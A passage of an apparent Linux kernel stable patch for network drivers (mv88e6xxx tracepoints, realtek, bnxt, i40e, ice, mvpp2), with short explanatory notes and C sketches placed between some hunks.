++	err = mv88e6xxx_g1_write(chip, MV88E6XXX_G1_ATU_OP,
++				 MV88E6XXX_G1_ATU_OP_BUSY |
++				 MV88E6XXX_G1_ATU_OP_GET_CLR_VIOLATION);
++	if (err)
++		return err;
++
++	return mv88e6xxx_g1_atu_op_wait(chip);
++}
++
+ static int mv88e6xxx_g1_atu_op(struct mv88e6xxx_chip *chip, u16 fid, u16 op)
+ {
+ 	u16 val;
+@@ -159,6 +173,41 @@ int mv88e6xxx_g1_atu_get_next(struct mv88e6xxx_chip *chip, u16 fid)
+ 	return mv88e6xxx_g1_atu_op(chip, fid, MV88E6XXX_G1_ATU_OP_GET_NEXT_DB);
+ }
+ 
++static int mv88e6xxx_g1_atu_fid_read(struct mv88e6xxx_chip *chip, u16 *fid)
++{
++	u16 val = 0, upper = 0, op = 0;
++	int err = -EOPNOTSUPP;
++
++	if (mv88e6xxx_num_databases(chip) > 256) {
++		err = mv88e6xxx_g1_read(chip, MV88E6352_G1_ATU_FID, &val);
++		if (err)
++			return err;
++		val &= 0xfff;
++	} else {
++		err = mv88e6xxx_g1_read(chip, MV88E6XXX_G1_ATU_OP, &op);
++		if (err)
++			return err;
++		if (mv88e6xxx_num_databases(chip) > 64) {
++			/* ATU DBNum[7:4] are located in ATU Control 15:12 */
++			err = mv88e6xxx_g1_read(chip, MV88E6XXX_G1_ATU_CTL,
++						&upper);
++			if (err)
++				return err;
++
++			upper = (upper >> 8) & 0x00f0;
++		} else if (mv88e6xxx_num_databases(chip) > 16) {
++			/* ATU DBNum[5:4] are located in ATU Operation 9:8 */
++			upper = (op >> 4) & 0x30;
++		}
++
++		/* ATU DBNum[3:0] are located in ATU Operation 3:0 */
++		val = (op & 0xf) | upper;
++	}
++	*fid = val;
++
++	return err;
++}
++
+ /* Offset 0x0C: ATU Data Register */
+ 
+ static int mv88e6xxx_g1_atu_data_read(struct mv88e6xxx_chip *chip,
+@@ -353,14 +402,12 @@ static irqreturn_t mv88e6xxx_g1_atu_prob_irq_thread_fn(int irq, void *dev_id)
+ {
+ 	struct mv88e6xxx_chip *chip = dev_id;
+ 	struct mv88e6xxx_atu_entry entry;
+-	int spid;
+-	int err;
+-	u16 val;
++	int err, spid;
++	u16 val, fid;
+ 
+ 	mv88e6xxx_reg_lock(chip);
+ 
+-	err = mv88e6xxx_g1_atu_op(chip, 0,
+-				  MV88E6XXX_G1_ATU_OP_GET_CLR_VIOLATION);
++	err = mv88e6xxx_g1_read_atu_violation(chip);
+ 	if (err)
+ 		goto out;
+ 
+@@ -368,6 +415,10 @@ static irqreturn_t mv88e6xxx_g1_atu_prob_irq_thread_fn(int irq, void *dev_id)
+ 	if (err)
+ 		goto out;
+ 
++	err = mv88e6xxx_g1_atu_fid_read(chip, &fid);
++	if (err)
++		goto out;
++
+ 	err = mv88e6xxx_g1_atu_data_read(chip, &entry);
+ 	if (err)
+ 		goto out;
+@@ -385,23 +436,23 @@ static irqreturn_t mv88e6xxx_g1_atu_prob_irq_thread_fn(int irq, void *dev_id)
+ 	}
+ 
+ 	if (val & MV88E6XXX_G1_ATU_OP_MEMBER_VIOLATION) {
+-		dev_err_ratelimited(chip->dev,
+-				    "ATU member violation for %pM portvec %x spid %d\n",
+-				    entry.mac, entry.portvec, spid);
++		trace_mv88e6xxx_atu_member_violation(chip->dev, spid,
++						     entry.portvec, entry.mac,
++						     fid);
+ 		chip->ports[spid].atu_member_violation++;
+ 	}
+ 
+ 	if (val & MV88E6XXX_G1_ATU_OP_MISS_VIOLATION) {
+-		dev_err_ratelimited(chip->dev,
+-				    "ATU miss violation for %pM portvec %x spid %d\n",
+-				    entry.mac, entry.portvec, spid);
++		trace_mv88e6xxx_atu_miss_violation(chip->dev, spid,
++						   entry.portvec, entry.mac,
++						   fid);
+ 		chip->ports[spid].atu_miss_violation++;
+ 	}
+ 
+ 	if (val & MV88E6XXX_G1_ATU_OP_FULL_VIOLATION) {
+-		dev_err_ratelimited(chip->dev,
+-				    "ATU full violation for %pM portvec %x spid %d\n",
+-				    entry.mac, entry.portvec, spid);
++		trace_mv88e6xxx_atu_full_violation(chip->dev, spid,
++						   entry.portvec, entry.mac,
++						   fid);
+ 		chip->ports[spid].atu_full_violation++;
+ 	}
+ 	mv88e6xxx_reg_unlock(chip);
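
[Editor's illustration] mv88e6xxx_g1_atu_fid_read() reassembles the FID from wherever the chip family keeps it: a dedicated register above 256 databases, otherwise DBNum[3:0] in the ATU op register plus optional upper bits in ATU control or op. A standalone sketch of the more-than-64-database case, with invented register values:

#include <stdio.h>
#include <stdint.h>

/* Reassemble a FID for a chip with >64 databases: DBNum[3:0] live in
 * ATU_OP bits 3:0 and DBNum[7:4] in ATU_CTL bits 15:12, mirroring
 * mv88e6xxx_g1_atu_fid_read(). The register values are made up. */
int main(void)
{
	uint16_t atu_op  = 0xB007;	/* DBNum[3:0] = 0x7 */
	uint16_t atu_ctl = 0x5123;	/* DBNum[7:4] = 0x5 */

	uint16_t upper = (atu_ctl >> 8) & 0x00f0;	/* 0x50 */
	uint16_t fid   = (atu_op & 0xf) | upper;	/* 0x57 */

	printf("fid = 0x%02x\n", fid);
	return 0;
}
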
+diff --git a/drivers/net/dsa/mv88e6xxx/global1_vtu.c b/drivers/net/dsa/mv88e6xxx/global1_vtu.c
+index 38e18f5811bfb..bcfb4a812055c 100644
+--- a/drivers/net/dsa/mv88e6xxx/global1_vtu.c
++++ b/drivers/net/dsa/mv88e6xxx/global1_vtu.c
+@@ -13,6 +13,7 @@
+ 
+ #include "chip.h"
+ #include "global1.h"
++#include "trace.h"
+ 
+ /* Offset 0x02: VTU FID Register */
+ 
+@@ -628,14 +629,12 @@ static irqreturn_t mv88e6xxx_g1_vtu_prob_irq_thread_fn(int irq, void *dev_id)
+ 	spid = val & MV88E6XXX_G1_VTU_OP_SPID_MASK;
+ 
+ 	if (val & MV88E6XXX_G1_VTU_OP_MEMBER_VIOLATION) {
+-		dev_err_ratelimited(chip->dev, "VTU member violation for vid %d, source port %d\n",
+-				    vid, spid);
++		trace_mv88e6xxx_vtu_member_violation(chip->dev, spid, vid);
+ 		chip->ports[spid].vtu_member_violation++;
+ 	}
+ 
+ 	if (val & MV88E6XXX_G1_VTU_OP_MISS_VIOLATION) {
+-		dev_dbg_ratelimited(chip->dev, "VTU miss violation for vid %d, source port %d\n",
+-				    vid, spid);
++		trace_mv88e6xxx_vtu_miss_violation(chip->dev, spid, vid);
+ 		chip->ports[spid].vtu_miss_violation++;
+ 	}
+ 
+diff --git a/drivers/net/dsa/mv88e6xxx/trace.c b/drivers/net/dsa/mv88e6xxx/trace.c
+new file mode 100644
+index 0000000000000..7833cb50ca5d7
+--- /dev/null
++++ b/drivers/net/dsa/mv88e6xxx/trace.c
+@@ -0,0 +1,6 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/* Copyright 2022 NXP
++ */
++
++#define CREATE_TRACE_POINTS
++#include "trace.h"
+diff --git a/drivers/net/dsa/mv88e6xxx/trace.h b/drivers/net/dsa/mv88e6xxx/trace.h
+new file mode 100644
+index 0000000000000..f59ca04768e79
+--- /dev/null
++++ b/drivers/net/dsa/mv88e6xxx/trace.h
+@@ -0,0 +1,96 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/* Copyright 2022 NXP
++ */
++
++#undef TRACE_SYSTEM
++#define TRACE_SYSTEM	mv88e6xxx
++
++#if !defined(_MV88E6XXX_TRACE_H) || defined(TRACE_HEADER_MULTI_READ)
++#define _MV88E6XXX_TRACE_H
++
++#include <linux/device.h>
++#include <linux/if_ether.h>
++#include <linux/tracepoint.h>
++
++DECLARE_EVENT_CLASS(mv88e6xxx_atu_violation,
++
++	TP_PROTO(const struct device *dev, int spid, u16 portvec,
++		 const unsigned char *addr, u16 fid),
++
++	TP_ARGS(dev, spid, portvec, addr, fid),
++
++	TP_STRUCT__entry(
++		__string(name, dev_name(dev))
++		__field(int, spid)
++		__field(u16, portvec)
++		__array(unsigned char, addr, ETH_ALEN)
++		__field(u16, fid)
++	),
++
++	TP_fast_assign(
++		__assign_str(name, dev_name(dev));
++		__entry->spid = spid;
++		__entry->portvec = portvec;
++		memcpy(__entry->addr, addr, ETH_ALEN);
++		__entry->fid = fid;
++	),
++
++	TP_printk("dev %s spid %d portvec 0x%x addr %pM fid %u",
++		  __get_str(name), __entry->spid, __entry->portvec,
++		  __entry->addr, __entry->fid)
++);
++
++DEFINE_EVENT(mv88e6xxx_atu_violation, mv88e6xxx_atu_member_violation,
++	     TP_PROTO(const struct device *dev, int spid, u16 portvec,
++		      const unsigned char *addr, u16 fid),
++	     TP_ARGS(dev, spid, portvec, addr, fid));
++
++DEFINE_EVENT(mv88e6xxx_atu_violation, mv88e6xxx_atu_miss_violation,
++	     TP_PROTO(const struct device *dev, int spid, u16 portvec,
++		      const unsigned char *addr, u16 fid),
++	     TP_ARGS(dev, spid, portvec, addr, fid));
++
++DEFINE_EVENT(mv88e6xxx_atu_violation, mv88e6xxx_atu_full_violation,
++	     TP_PROTO(const struct device *dev, int spid, u16 portvec,
++		      const unsigned char *addr, u16 fid),
++	     TP_ARGS(dev, spid, portvec, addr, fid));
++
++DECLARE_EVENT_CLASS(mv88e6xxx_vtu_violation,
++
++	TP_PROTO(const struct device *dev, int spid, u16 vid),
++
++	TP_ARGS(dev, spid, vid),
++
++	TP_STRUCT__entry(
++		__string(name, dev_name(dev))
++		__field(int, spid)
++		__field(u16, vid)
++	),
++
++	TP_fast_assign(
++		__assign_str(name, dev_name(dev));
++		__entry->spid = spid;
++		__entry->vid = vid;
++	),
++
++	TP_printk("dev %s spid %d vid %u",
++		  __get_str(name), __entry->spid, __entry->vid)
++);
++
++DEFINE_EVENT(mv88e6xxx_vtu_violation, mv88e6xxx_vtu_member_violation,
++	     TP_PROTO(const struct device *dev, int spid, u16 vid),
++	     TP_ARGS(dev, spid, vid));
++
++DEFINE_EVENT(mv88e6xxx_vtu_violation, mv88e6xxx_vtu_miss_violation,
++	     TP_PROTO(const struct device *dev, int spid, u16 vid),
++	     TP_ARGS(dev, spid, vid));
++
++#endif /* _MV88E6XXX_TRACE_H */
++
++/* We don't want to use include/trace/events */
++#undef TRACE_INCLUDE_PATH
++#define TRACE_INCLUDE_PATH .
++#undef TRACE_INCLUDE_FILE
++#define TRACE_INCLUDE_FILE	trace
++/* This part must be outside protection */
++#include <trace/define_trace.h>
+diff --git a/drivers/net/dsa/realtek/realtek-mdio.c b/drivers/net/dsa/realtek/realtek-mdio.c
+index 3e54fac5f9027..5a8fe707ca25e 100644
+--- a/drivers/net/dsa/realtek/realtek-mdio.c
++++ b/drivers/net/dsa/realtek/realtek-mdio.c
+@@ -21,6 +21,7 @@
+ 
+ #include <linux/module.h>
+ #include <linux/of_device.h>
++#include <linux/overflow.h>
+ #include <linux/regmap.h>
+ 
+ #include "realtek.h"
+@@ -152,7 +153,9 @@ static int realtek_mdio_probe(struct mdio_device *mdiodev)
+ 	if (!var)
+ 		return -EINVAL;
+ 
+-	priv = devm_kzalloc(&mdiodev->dev, sizeof(*priv), GFP_KERNEL);
++	priv = devm_kzalloc(&mdiodev->dev,
++			    size_add(sizeof(*priv), var->chip_data_sz),
++			    GFP_KERNEL);
+ 	if (!priv)
+ 		return -ENOMEM;
+ 
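
The size_add() conversion above guards the sizeof(*priv) + chip_data_sz sum: the helper from <linux/overflow.h> saturates at SIZE_MAX, so an overflowing request makes the allocator fail cleanly instead of handing back a too-small buffer. A minimal sketch of the saturating semantics in plain C (a userspace stand-in, not the kernel implementation):

#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

static size_t size_add_sat(size_t a, size_t b)
{
	size_t sum = a + b;

	/* On wraparound, pin to SIZE_MAX so a later allocation fails
	 * instead of silently shrinking.
	 */
	return sum < a ? SIZE_MAX : sum;
}

int main(void)
{
	printf("%zu\n", size_add_sat(16, 32));			/* 48 */
	printf("%d\n", size_add_sat(SIZE_MAX, 1) == SIZE_MAX);	/* 1 */
	return 0;
}
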
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt.c b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+index 251b102d2792b..c6e36603bd2db 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+@@ -175,12 +175,12 @@ static const struct pci_device_id bnxt_pci_tbl[] = {
+ 	{ PCI_VDEVICE(BROADCOM, 0x1750), .driver_data = BCM57508 },
+ 	{ PCI_VDEVICE(BROADCOM, 0x1751), .driver_data = BCM57504 },
+ 	{ PCI_VDEVICE(BROADCOM, 0x1752), .driver_data = BCM57502 },
+-	{ PCI_VDEVICE(BROADCOM, 0x1800), .driver_data = BCM57508_NPAR },
++	{ PCI_VDEVICE(BROADCOM, 0x1800), .driver_data = BCM57502_NPAR },
+ 	{ PCI_VDEVICE(BROADCOM, 0x1801), .driver_data = BCM57504_NPAR },
+-	{ PCI_VDEVICE(BROADCOM, 0x1802), .driver_data = BCM57502_NPAR },
+-	{ PCI_VDEVICE(BROADCOM, 0x1803), .driver_data = BCM57508_NPAR },
++	{ PCI_VDEVICE(BROADCOM, 0x1802), .driver_data = BCM57508_NPAR },
++	{ PCI_VDEVICE(BROADCOM, 0x1803), .driver_data = BCM57502_NPAR },
+ 	{ PCI_VDEVICE(BROADCOM, 0x1804), .driver_data = BCM57504_NPAR },
+-	{ PCI_VDEVICE(BROADCOM, 0x1805), .driver_data = BCM57502_NPAR },
++	{ PCI_VDEVICE(BROADCOM, 0x1805), .driver_data = BCM57508_NPAR },
+ 	{ PCI_VDEVICE(BROADCOM, 0xd802), .driver_data = BCM58802 },
+ 	{ PCI_VDEVICE(BROADCOM, 0xd804), .driver_data = BCM58804 },
+ #ifdef CONFIG_BNXT_SRIOV
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt.h b/drivers/net/ethernet/broadcom/bnxt/bnxt.h
+index 02741d499bf4a..1d2588c92977e 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt.h
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt.h
+@@ -1225,6 +1225,7 @@ struct bnxt_link_info {
+ #define BNXT_LINK_SPEED_40GB	PORT_PHY_QCFG_RESP_LINK_SPEED_40GB
+ #define BNXT_LINK_SPEED_50GB	PORT_PHY_QCFG_RESP_LINK_SPEED_50GB
+ #define BNXT_LINK_SPEED_100GB	PORT_PHY_QCFG_RESP_LINK_SPEED_100GB
++#define BNXT_LINK_SPEED_200GB	PORT_PHY_QCFG_RESP_LINK_SPEED_200GB
+ 	u16			support_speeds;
+ 	u16			support_pam4_speeds;
+ 	u16			auto_link_speeds;	/* fw adv setting */
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt_ethtool.c b/drivers/net/ethernet/broadcom/bnxt/bnxt_ethtool.c
+index 703fc163235f9..01b973bc509f5 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt_ethtool.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt_ethtool.c
+@@ -1712,6 +1712,8 @@ u32 bnxt_fw_to_ethtool_speed(u16 fw_link_speed)
+ 		return SPEED_50000;
+ 	case BNXT_LINK_SPEED_100GB:
+ 		return SPEED_100000;
++	case BNXT_LINK_SPEED_200GB:
++		return SPEED_200000;
+ 	default:
+ 		return SPEED_UNKNOWN;
+ 	}
+@@ -3634,6 +3636,7 @@ static void bnxt_self_test(struct net_device *dev, struct ethtool_test *etest,
+ 		bnxt_ulp_stop(bp);
+ 		rc = bnxt_close_nic(bp, true, false);
+ 		if (rc) {
++			etest->flags |= ETH_TEST_FL_FAILED;
+ 			bnxt_ulp_start(bp, rc);
+ 			return;
+ 		}
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_diag.c b/drivers/net/ethernet/intel/i40e/i40e_diag.c
+index ef4d3762bf371..ca229b0efeb65 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_diag.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_diag.c
+@@ -44,7 +44,7 @@ static i40e_status i40e_diag_reg_pattern_test(struct i40e_hw *hw,
+ 	return 0;
+ }
+ 
+-struct i40e_diag_reg_test_info i40e_reg_list[] = {
++const struct i40e_diag_reg_test_info i40e_reg_list[] = {
+ 	/* offset               mask         elements   stride */
+ 	{I40E_QTX_CTL(0),       0x0000FFBF, 1,
+ 		I40E_QTX_CTL(1) - I40E_QTX_CTL(0)},
+@@ -78,27 +78,28 @@ i40e_status i40e_diag_reg_test(struct i40e_hw *hw)
+ {
+ 	i40e_status ret_code = 0;
+ 	u32 reg, mask;
++	u32 elements;
+ 	u32 i, j;
+ 
+ 	for (i = 0; i40e_reg_list[i].offset != 0 &&
+ 					     !ret_code; i++) {
+ 
++		elements = i40e_reg_list[i].elements;
+ 		/* set actual reg range for dynamically allocated resources */
+ 		if (i40e_reg_list[i].offset == I40E_QTX_CTL(0) &&
+ 		    hw->func_caps.num_tx_qp != 0)
+-			i40e_reg_list[i].elements = hw->func_caps.num_tx_qp;
++			elements = hw->func_caps.num_tx_qp;
+ 		if ((i40e_reg_list[i].offset == I40E_PFINT_ITRN(0, 0) ||
+ 		     i40e_reg_list[i].offset == I40E_PFINT_ITRN(1, 0) ||
+ 		     i40e_reg_list[i].offset == I40E_PFINT_ITRN(2, 0) ||
+ 		     i40e_reg_list[i].offset == I40E_QINT_TQCTL(0) ||
+ 		     i40e_reg_list[i].offset == I40E_QINT_RQCTL(0)) &&
+ 		    hw->func_caps.num_msix_vectors != 0)
+-			i40e_reg_list[i].elements =
+-				hw->func_caps.num_msix_vectors - 1;
++			elements = hw->func_caps.num_msix_vectors - 1;
+ 
+ 		/* test register access */
+ 		mask = i40e_reg_list[i].mask;
+-		for (j = 0; j < i40e_reg_list[i].elements && !ret_code; j++) {
++		for (j = 0; j < elements && !ret_code; j++) {
+ 			reg = i40e_reg_list[i].offset +
+ 			      (j * i40e_reg_list[i].stride);
+ 			ret_code = i40e_diag_reg_pattern_test(hw, reg, mask);
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_diag.h b/drivers/net/ethernet/intel/i40e/i40e_diag.h
+index c3340f320a18c..1db7c6d572311 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_diag.h
++++ b/drivers/net/ethernet/intel/i40e/i40e_diag.h
+@@ -20,7 +20,7 @@ struct i40e_diag_reg_test_info {
+ 	u32 stride;	/* bytes between each element */
+ };
+ 
+-extern struct i40e_diag_reg_test_info i40e_reg_list[];
++extern const struct i40e_diag_reg_test_info i40e_reg_list[];
+ 
+ i40e_status i40e_diag_reg_test(struct i40e_hw *hw);
+ i40e_status i40e_diag_eeprom_test(struct i40e_hw *hw);
+diff --git a/drivers/net/ethernet/intel/ice/ice_sched.c b/drivers/net/ethernet/intel/ice/ice_sched.c
+index 118595763bba3..2c62c1763ee0d 100644
+--- a/drivers/net/ethernet/intel/ice/ice_sched.c
++++ b/drivers/net/ethernet/intel/ice/ice_sched.c
+@@ -2756,7 +2756,7 @@ static int
+ ice_sched_assoc_vsi_to_agg(struct ice_port_info *pi, u32 agg_id,
+ 			   u16 vsi_handle, unsigned long *tc_bitmap)
+ {
+-	struct ice_sched_agg_vsi_info *agg_vsi_info, *old_agg_vsi_info = NULL;
++	struct ice_sched_agg_vsi_info *agg_vsi_info, *iter, *old_agg_vsi_info = NULL;
+ 	struct ice_sched_agg_info *agg_info, *old_agg_info;
+ 	struct ice_hw *hw = pi->hw;
+ 	int status = 0;
+@@ -2774,11 +2774,13 @@ ice_sched_assoc_vsi_to_agg(struct ice_port_info *pi, u32 agg_id,
+ 	if (old_agg_info && old_agg_info != agg_info) {
+ 		struct ice_sched_agg_vsi_info *vtmp;
+ 
+-		list_for_each_entry_safe(old_agg_vsi_info, vtmp,
++		list_for_each_entry_safe(iter, vtmp,
+ 					 &old_agg_info->agg_vsi_list,
+ 					 list_entry)
+-			if (old_agg_vsi_info->vsi_handle == vsi_handle)
++			if (iter->vsi_handle == vsi_handle) {
++				old_agg_vsi_info = iter;
+ 				break;
++			}
+ 	}
+ 
+ 	/* check if entry already exist */
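
The ice_sched change above fixes a classic list_for_each_entry_safe() pitfall: if the loop runs to completion without a match, the cursor no longer points at a real element, so using it afterwards is undefined. The cure is to scan with a throwaway iterator and publish a separate pointer only on a hit. The same shape in self-contained C (a plain singly linked list, illustrative only):

#include <stdio.h>
#include <stddef.h>

struct node {
	int vsi_handle;
	struct node *next;
};

static struct node *find_vsi(struct node *head, int vsi_handle)
{
	struct node *iter, *found = NULL;

	for (iter = head; iter; iter = iter->next) {
		if (iter->vsi_handle == vsi_handle) {
			found = iter;	/* publish only on a real match */
			break;
		}
	}

	return found;	/* stays NULL when the loop ran off the end */
}

int main(void)
{
	struct node b = { 2, NULL }, a = { 1, &b };

	printf("%p\n", (void *)find_vsi(&a, 3));	/* no match -> NULL */
	return 0;
}
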
+diff --git a/drivers/net/ethernet/intel/ice/ice_switch.c b/drivers/net/ethernet/intel/ice/ice_switch.c
+index 61f844d225123..46b36851af460 100644
+--- a/drivers/net/ethernet/intel/ice/ice_switch.c
++++ b/drivers/net/ethernet/intel/ice/ice_switch.c
+@@ -1780,18 +1780,36 @@ ice_update_vsi(struct ice_hw *hw, u16 vsi_handle, struct ice_vsi_ctx *vsi_ctx,
+ int
+ ice_cfg_rdma_fltr(struct ice_hw *hw, u16 vsi_handle, bool enable)
+ {
+-	struct ice_vsi_ctx *ctx;
++	struct ice_vsi_ctx *ctx, *cached_ctx;
++	int status;
++
++	cached_ctx = ice_get_vsi_ctx(hw, vsi_handle);
++	if (!cached_ctx)
++		return -ENOENT;
+ 
+-	ctx = ice_get_vsi_ctx(hw, vsi_handle);
++	ctx = kzalloc(sizeof(*ctx), GFP_KERNEL);
+ 	if (!ctx)
+-		return -EIO;
++		return -ENOMEM;
++
++	ctx->info.q_opt_rss = cached_ctx->info.q_opt_rss;
++	ctx->info.q_opt_tc = cached_ctx->info.q_opt_tc;
++	ctx->info.q_opt_flags = cached_ctx->info.q_opt_flags;
++
++	ctx->info.valid_sections = cpu_to_le16(ICE_AQ_VSI_PROP_Q_OPT_VALID);
+ 
+ 	if (enable)
+ 		ctx->info.q_opt_flags |= ICE_AQ_VSI_Q_OPT_PE_FLTR_EN;
+ 	else
+ 		ctx->info.q_opt_flags &= ~ICE_AQ_VSI_Q_OPT_PE_FLTR_EN;
+ 
+-	return ice_update_vsi(hw, vsi_handle, ctx, NULL);
++	status = ice_update_vsi(hw, vsi_handle, ctx, NULL);
++	if (!status) {
++		cached_ctx->info.q_opt_flags = ctx->info.q_opt_flags;
++		cached_ctx->info.valid_sections |= ctx->info.valid_sections;
++	}
++
++	kfree(ctx);
++	return status;
+ }
+ 
+ /**
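
ice_cfg_rdma_fltr() above now edits a scratch copy of the cached VSI context and folds the change back only once the firmware accepts it, so a failed update can no longer leave stale flags in the cache. A condensed sketch of that copy/commit pattern; update_hw() stands in for the real ice_update_vsi() call and is an assumption, not driver API:

#include <stdlib.h>

struct ctx {
	unsigned short q_opt_flags;
};

/* Pretend firmware call: returns 0 on success. */
static int update_hw(const struct ctx *c)
{
	(void)c;
	return 0;
}

static int cfg_flag(struct ctx *cached, unsigned short flag, int enable)
{
	struct ctx *scratch = calloc(1, sizeof(*scratch));
	int ret;

	if (!scratch)
		return -1;

	scratch->q_opt_flags = cached->q_opt_flags;
	if (enable)
		scratch->q_opt_flags |= flag;
	else
		scratch->q_opt_flags &= ~flag;

	ret = update_hw(scratch);
	if (!ret)	/* commit to the cache only on success */
		cached->q_opt_flags = scratch->q_opt_flags;

	free(scratch);
	return ret;
}

int main(void)
{
	struct ctx cached = { 0 };

	return cfg_flag(&cached, 0x4, 1);
}
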
+diff --git a/drivers/net/ethernet/intel/ice/ice_virtchnl_fdir.c b/drivers/net/ethernet/intel/ice/ice_virtchnl_fdir.c
+index c6a58343d81d8..a2645ff3100e4 100644
+--- a/drivers/net/ethernet/intel/ice/ice_virtchnl_fdir.c
++++ b/drivers/net/ethernet/intel/ice/ice_virtchnl_fdir.c
+@@ -541,6 +541,72 @@ static void ice_vc_fdir_rem_prof_all(struct ice_vf *vf)
+ 	}
+ }
+ 
++/**
++ * ice_vc_fdir_has_prof_conflict
++ * @vf: pointer to the VF structure
++ * @conf: FDIR configuration for each filter
++ *
++ * Check if @conf has conflicting profile with existing profiles
++ *
++ * Return: true on success, and false on error.
++ */
++static bool
++ice_vc_fdir_has_prof_conflict(struct ice_vf *vf,
++			      struct virtchnl_fdir_fltr_conf *conf)
++{
++	struct ice_fdir_fltr *desc;
++
++	list_for_each_entry(desc, &vf->fdir.fdir_rule_list, fltr_node) {
++		struct virtchnl_fdir_fltr_conf *existing_conf;
++		enum ice_fltr_ptype flow_type_a, flow_type_b;
++		struct ice_fdir_fltr *a, *b;
++
++		existing_conf = to_fltr_conf_from_desc(desc);
++		a = &existing_conf->input;
++		b = &conf->input;
++		flow_type_a = a->flow_type;
++		flow_type_b = b->flow_type;
++
++		/* No need to compare two rules with different tunnel types or
++		 * with the same protocol type.
++		 */
++		if (existing_conf->ttype != conf->ttype ||
++		    flow_type_a == flow_type_b)
++			continue;
++
++		switch (flow_type_a) {
++		case ICE_FLTR_PTYPE_NONF_IPV4_UDP:
++		case ICE_FLTR_PTYPE_NONF_IPV4_TCP:
++		case ICE_FLTR_PTYPE_NONF_IPV4_SCTP:
++			if (flow_type_b == ICE_FLTR_PTYPE_NONF_IPV4_OTHER)
++				return true;
++			break;
++		case ICE_FLTR_PTYPE_NONF_IPV4_OTHER:
++			if (flow_type_b == ICE_FLTR_PTYPE_NONF_IPV4_UDP ||
++			    flow_type_b == ICE_FLTR_PTYPE_NONF_IPV4_TCP ||
++			    flow_type_b == ICE_FLTR_PTYPE_NONF_IPV4_SCTP)
++				return true;
++			break;
++		case ICE_FLTR_PTYPE_NONF_IPV6_UDP:
++		case ICE_FLTR_PTYPE_NONF_IPV6_TCP:
++		case ICE_FLTR_PTYPE_NONF_IPV6_SCTP:
++			if (flow_type_b == ICE_FLTR_PTYPE_NONF_IPV6_OTHER)
++				return true;
++			break;
++		case ICE_FLTR_PTYPE_NONF_IPV6_OTHER:
++			if (flow_type_b == ICE_FLTR_PTYPE_NONF_IPV6_UDP ||
++			    flow_type_b == ICE_FLTR_PTYPE_NONF_IPV6_TCP ||
++			    flow_type_b == ICE_FLTR_PTYPE_NONF_IPV6_SCTP)
++				return true;
++			break;
++		default:
++			break;
++		}
++	}
++
++	return false;
++}
++
+ /**
+  * ice_vc_fdir_write_flow_prof
+  * @vf: pointer to the VF structure
+@@ -677,6 +743,13 @@ ice_vc_fdir_config_input_set(struct ice_vf *vf, struct virtchnl_fdir_add *fltr,
+ 	enum ice_fltr_ptype flow;
+ 	int ret;
+ 
++	ret = ice_vc_fdir_has_prof_conflict(vf, conf);
++	if (ret) {
++		dev_dbg(dev, "Found flow profile conflict for VF %d\n",
++			vf->vf_id);
++		return ret;
++	}
++
+ 	flow = input->flow_type;
+ 	ret = ice_vc_fdir_alloc_prof(vf, flow);
+ 	if (ret) {
+diff --git a/drivers/net/ethernet/marvell/mvpp2/mvpp2_cls.c b/drivers/net/ethernet/marvell/mvpp2/mvpp2_cls.c
+index 41d935d1aaf6f..40aeaa7bd739f 100644
+--- a/drivers/net/ethernet/marvell/mvpp2/mvpp2_cls.c
++++ b/drivers/net/ethernet/marvell/mvpp2/mvpp2_cls.c
+@@ -62,35 +62,38 @@ static const struct mvpp2_cls_flow cls_flows[MVPP2_N_PRS_FLOWS] = {
+ 	MVPP2_DEF_FLOW(MVPP22_FLOW_TCP4, MVPP2_FL_IP4_TCP_FRAG_UNTAG,
+ 		       MVPP22_CLS_HEK_IP4_2T,
+ 		       MVPP2_PRS_RI_VLAN_NONE | MVPP2_PRS_RI_L3_IP4 |
+-		       MVPP2_PRS_RI_L4_TCP,
++		       MVPP2_PRS_RI_IP_FRAG_TRUE | MVPP2_PRS_RI_L4_TCP,
+ 		       MVPP2_PRS_IP_MASK | MVPP2_PRS_RI_VLAN_MASK),
+ 
+ 	MVPP2_DEF_FLOW(MVPP22_FLOW_TCP4, MVPP2_FL_IP4_TCP_FRAG_UNTAG,
+ 		       MVPP22_CLS_HEK_IP4_2T,
+ 		       MVPP2_PRS_RI_VLAN_NONE | MVPP2_PRS_RI_L3_IP4_OPT |
+-		       MVPP2_PRS_RI_L4_TCP,
++		       MVPP2_PRS_RI_IP_FRAG_TRUE | MVPP2_PRS_RI_L4_TCP,
+ 		       MVPP2_PRS_IP_MASK | MVPP2_PRS_RI_VLAN_MASK),
+ 
+ 	MVPP2_DEF_FLOW(MVPP22_FLOW_TCP4, MVPP2_FL_IP4_TCP_FRAG_UNTAG,
+ 		       MVPP22_CLS_HEK_IP4_2T,
+ 		       MVPP2_PRS_RI_VLAN_NONE | MVPP2_PRS_RI_L3_IP4_OTHER |
+-		       MVPP2_PRS_RI_L4_TCP,
++		       MVPP2_PRS_RI_IP_FRAG_TRUE | MVPP2_PRS_RI_L4_TCP,
+ 		       MVPP2_PRS_IP_MASK | MVPP2_PRS_RI_VLAN_MASK),
+ 
+ 	/* TCP over IPv4 flows, fragmented, with vlan tag */
+ 	MVPP2_DEF_FLOW(MVPP22_FLOW_TCP4, MVPP2_FL_IP4_TCP_FRAG_TAG,
+ 		       MVPP22_CLS_HEK_IP4_2T | MVPP22_CLS_HEK_TAGGED,
+-		       MVPP2_PRS_RI_L3_IP4 | MVPP2_PRS_RI_L4_TCP,
++		       MVPP2_PRS_RI_L3_IP4 | MVPP2_PRS_RI_IP_FRAG_TRUE |
++			   MVPP2_PRS_RI_L4_TCP,
+ 		       MVPP2_PRS_IP_MASK),
+ 
